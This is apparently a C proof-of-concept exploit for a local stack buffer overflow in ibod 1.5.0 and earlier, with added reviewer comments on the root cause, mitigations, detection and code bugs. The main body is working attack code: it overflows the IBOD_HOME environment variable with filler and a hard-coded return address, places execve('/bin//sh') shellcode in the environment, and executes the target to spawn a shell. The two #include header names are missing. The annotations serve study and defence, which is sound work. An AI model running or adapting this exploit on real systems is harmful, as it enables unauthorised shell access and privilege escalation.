/*
 * ibod_bof.c
 *
 * IBOD <= 1.5.0 local buffer overflow exploit (Proof of Concept)
 *
 * Tested in Slackware Linux 10.0
 *
 * by CoKi
 * No System Group - http://www.nosystem.com.ar
 *
 * Reviewer notes (defensive reading of this listing):
 *  - The program places an over-long value in the IBOD_HOME environment
 *    variable and then executes the target binary. The flaw demonstrated
 *    is therefore presumably an unbounded copy of IBOD_HOME into a
 *    fixed-size stack buffer inside ibod. The ibod source is not shown
 *    here; confirm against the vendor's fix.
 *  - Root-cause mitigation on the ibod side: length-check environment
 *    input and use a bounded copy (e.g. snprintf with the destination
 *    size) before it reaches any stack buffer.
 *  - The return address below is a hard-coded guess that depends on a
 *    fixed, non-randomised 32-bit stack layout and an executable stack.
 *    ASLR, a non-executable stack (NX) and compiler stack protectors each
 *    invalidate that assumption independently.
 *  - Detection idea: an exec of ibod whose environment carries an
 *    IBOD_HOME value hundreds of bytes long, or containing non-path
 *    bytes, is abnormal and worth alerting on.
 *  - The page extraction collapsed the file onto one line and stripped
 *    the header names after the two #include directives below.
 */

#include /* header name lost in page extraction; not recoverable from this listing */
#include /* header name lost in page extraction; not recoverable from this listing */

/*
 * Size of the environment value that is built: 540 filler bytes plus a
 * 4-byte address. The macro is not parenthesised, so `BUFFER-4` below
 * expands to `540 + 4-4` (= 540), which happens to be the intended value.
 */
#define BUFFER 540 + 4

/*
 * Payload exported through the SHELLCODE environment variable.
 * Per the author's per-instruction comments it is Linux/i386 code that
 * pushes the string "/bin//sh", builds an argv array on the stack and
 * issues system call 0xb (execve on i386) via int $0x80.
 */
char shellcode[]=
	"\x31\xc0"             /* xor  %eax,%eax        */
	"\x31\xd2"             /* xor  %edx,%edx        */
	"\x52"                 /* push %edx             */
	"\x68\x2f\x2f\x73\x68" /* push $0x68732f2f      */
	"\x68\x2f\x62\x69\x6e" /* push $0x6e69622f      */
	"\x89\xe3"             /* movl %esp,%ebx        */
	"\x52"                 /* push %edx             */
	"\x53"                 /* push %ebx             */
	"\x89\xe1"             /* movl %esp,%ecx        */
	"\xb0\x0b"             /* mov  $0xb,%al         */
	"\xcd\x80";            /* int  $0x80            */

/* Prints the usage line and exits with status 1; defined after main(). */
void use(char *program);

/*
 * Entry point. Expects exactly one argument: the path of the ibod binary
 * to execute. Builds the IBOD_HOME and SHELLCODE environment variables
 * and then replaces the current process with the target via execl().
 *
 * Returns: nothing explicitly. If execl() fails, control falls off the
 * end of main() without a return statement or an error message.
 */
int main(int argc, char *argv[]) {

	FILE *file;
	char buf[BUFFER], *path, tmp[BUFFER];
	char *buffer=buf;
	int ret;

	/* Exactly one argument is required; use() does not return. */
	if(argc != 2) use(argv[0]);

	path = argv[1];

	/*
	 * fopen() serves only as an existence/readability check on the
	 * target: the handle is never read from and never closed.
	 */
	if((file = fopen(path, "r")) == NULL) {
		printf(" Failed to open file!\n");
		exit(1);
	}

	/*
	 * Guessed address of the payload inside the child process: a fixed
	 * constant near the top of the 32-bit user stack, minus the lengths
	 * of the payload and of the program path.
	 * NOTE(review): this is only meaningful when the stack base is
	 * identical on every run (no ASLR) and the stack is executable;
	 * the constant matches the author's stated test system only.
	 */
	ret = 0xbffffffa - strlen(shellcode) - strlen(path);

	/* Zero the buffer, then lay down 540 filler bytes ('A'). */
	bzero(buf, sizeof(buf));
	memset(buffer, 'A', BUFFER-4);

	/*
	 * Copies the raw bytes of `ret` into tmp as if they were a C string.
	 * NOTE(review): &ret is an int*, not a char*, so this is a format
	 * type mismatch; the copy stops at the first zero byte and reads
	 * past `ret` if none of its four bytes is zero.
	 */
	sprintf(tmp, "%s", &ret);

	/*
	 * Appends at most 4 bytes of the address after the filler.
	 * NOTE(review): 540 + 4 characters fill all 544 bytes of buf, so the
	 * terminating NUL written by strncat() lands one byte past the end
	 * of buf.
	 */
	strncat(buf, tmp, 4);

	printf("\n ibod <= 1.5.0 local stack buffer overflow (Proof of Concept)\n");
	printf(" by CoKi \n\n");

	/*
	 * Export both variables, overwriting any existing values (third
	 * argument 1). IBOD_HOME carries the filler plus the address;
	 * SHELLCODE carries the payload. setenv() results are not checked.
	 */
	setenv("IBOD_HOME", buf, 1);
	setenv("SHELLCODE", shellcode, 1);

	/*
	 * Replace this process with the target, inheriting the environment
	 * prepared above. The return value is not checked.
	 */
	execl(path, path, NULL);
}

/*
 * Prints a usage line containing the program name and terminates with
 * exit status 1.
 *
 * program: the name this tool was invoked as (argv[0]).
 */
void use(char *program) {
	printf(" Use: %s \n", program);
	exit(1);
}